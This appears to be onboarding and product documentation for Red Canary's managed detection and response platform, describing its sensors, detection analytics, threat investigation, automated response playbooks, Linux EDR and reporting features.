What is Red Canary?

Red Canary provides a security operations platform that proactively monitors for malicious and suspicious behaviors and responds to stop them from becoming serious security incidents. The platform works via several key components:

• Endpoint and cloud workload sensors/agents
• Alert collectors and integrations with your alert-generating security products
• Integrations with your cloud service providers, identity platforms, and SaaS applications
• Cloud-hosted collection, detection, and response platform
• Our Cyber Incident Response Team (CIRT)
• Our Threat Hunting team

The endpoint/cloud workload sensors run on the endpoints and cloud workloads that make up your corporate and production environments, collecting detailed telemetry about what is happening in those systems. 

The telemetry and alerts from your cloud service provider, identity platforms, SaaS applications, and other security products are both sent to our cloud-hosted platform. This allows our CIRT to perform analysis of that data to identify and confirm suspicious activity and security incidents. The included security orchestration and response capabilities can execute automations using playbooks on endpoints for response and remediation.

Your Red Canary incident handler assists and coaches your team about ways to improve your security program and reduce your risk through reporting, prevention recommendations, and deeper integrations between your other security products.

Getting Started

Getting set up with the Red Canary platform typically takes less than one hour, depending on how your organization deploys software to your endpoints and the scope and complexity of your other systems. Once deployed, your organization is immediately protected by a highly advanced security operations team.

To get started, visit the onboarding pages for your subscription(s). Note that for the Red Canary platform to work, you must meet the requirements listed for each subscription:

• MDR Endpoints and MDR Networks
  • One or more of the following:
    • Purchase supported endpoint detection and response (EDR) software from a third party
    • Purchase supported third-party EDR software from Red Canary
    • Subscribe to the Red Canary Linux EDR component of the platform
• MDR Identities
  • Integrate a supported identity platform technology with Red Canary
• MDR Cloud Control Plane
  • Integrate a supported cloud service provider with Red Canary
• MDR Cloud Instance
  • One or more of the following:
    • Purchase supported endpoint detection and response (EDR) software from a third party
    • Purchase supported third-party EDR software from Red Canary
    • Subscribe to the Red Canary Linux EDR component of the platform

Detecting potential threats

Red Canary’s detection process uses two primary classes of analytics:

• Every piece of telemetry is tested to determine if it matches an indicator of compromise (IOC) that we’ve seen or heard adversaries use. These are brittle and often short-lived analytics, but if an adversary is foolish enough to reuse infrastructure or tools, they are easy to catch.
• Behavioral detectors identify sequences of system activity that match techniques used by adversaries. These could be as simple as running PowerShell with an encoded command line or a highly complex chain of behavior over a long period of time. We map every detector to MITRE ATT&CK® techniques so you can quantify your detection coverage.

Unlike other security products, you do not need to define your own detection rules and indicators of compromise to get extremely effective results. From day one, you get the benefits of years of Red Canary detection engineering.

The Analyzed Events dashboard gives you an immediate view into the potential threats Red Canary is identifying in your organization using our threat intelligence and analytics. This page is where you’ll pivot into events if you want to learn more or check our work.

Learn more about how Red Canary detects threats.

Investigating potential threats

Threat hunting is performed by the Red Canary CIRT to exclude the false positives you’re used to from other security products and services. Instead of the legacy approach of simply triaging alerts and forwarding them to you to deal with, Red Canary handles everything up to the point of incident response (some teams call this “tier 1” and “tier 2”).

Threats in the Red Canary platform are classified as Unwanted Software, Suspicious Activity, or Malicious Software. Each threat contains the detail your team needs to assess the risk, which people and systems are affected, and the details of what happened.

Learn more about how Red Canary investigates and confirms threats.

Responding to threats

Reducing your time to response is one of our chief goals. Your time to respond is dependent on three activities:

1. How long it takes to detect and confirm a threat (Red Canary does this for you).
2. How long it takes you to receive the threat and decide how you want to respond.
3. How long it takes you to respond.

When you start with the Red Canary platform, the first automation you’ll enable is notifications about confirmed threats via email, phone, SMS, Slack, PagerDuty, etc.

After a few days or weeks, most teams establish their decision-making and response processes (steps 2 and 3) in configurable playbooks that are triggered automatically. Approval steps require manual intervention so you can check and approve each action before it is performed.

The peak of automation maturity is removing the approval safeties and allowing playbooks on endpoints to run without intervention. This enables high-quality response and remediation to take place regardless of where an affected system is located or what time of day it is for your security team.

Learn more about taking action on threats with automations.

Active Remediation for Endpoints

If you subscribe to the Red Canary Active Remediation for Endpoints add-on to the Red Canary platform, Red Canary will respond to high- and medium-severity threats identified by the Red Canary platform by taking remedial action on your covered endpoints via the tools available in your supported EDR software.

After subscribing, the Red Canary team will work with you to organize your covered endpoints into groups with your instructions as to how each endpoint should be handled in the event of a threat.

Linux EDR

Linux EDR is a Linux based EDR sensor which is deployed to physical, virtual, or cloud-based systems. Linux EDR monitors these systems and returns telemetry to the Red Canary Platform. Telemetry from Linux EDR is analyzed and investigated for threats through the normal process. Within the platform, customers can search their Linux EDR telemetry, and manage deployed sensors.

Reporting on your performance

Every great security program continually improves over time, and Red Canary is focused on helping you understand how you’re doing. 

Unlike the typical pie-chart-filled dashboards, Red Canary’s reporting library contains pre-built reports that are designed with help from your peers for inclusion in your executive and board presentations.

Learn more about how to get started with reporting.

Your ally in the fight

When an incident occurs, it is not always obvious what to do. The Red Canary team is on-call when you need help and provides proactive security architecture and engineering guidance. Most teams engage with threat hunting in three primary ways:

• Periodic sync: Your threat hunter joins a regularly scheduled meeting with your team to review recent detections, discuss security architecture, help with automation, and provide any other security guidance you need.
• Immediate assistance: Threat Hunting is on-call 24/7/365 for investigation support and remediation guidance.
• Proactive outreach: Our team will proactively communicate with your team if the Red Canary CIRT identifies a critical threat requiring immediate action.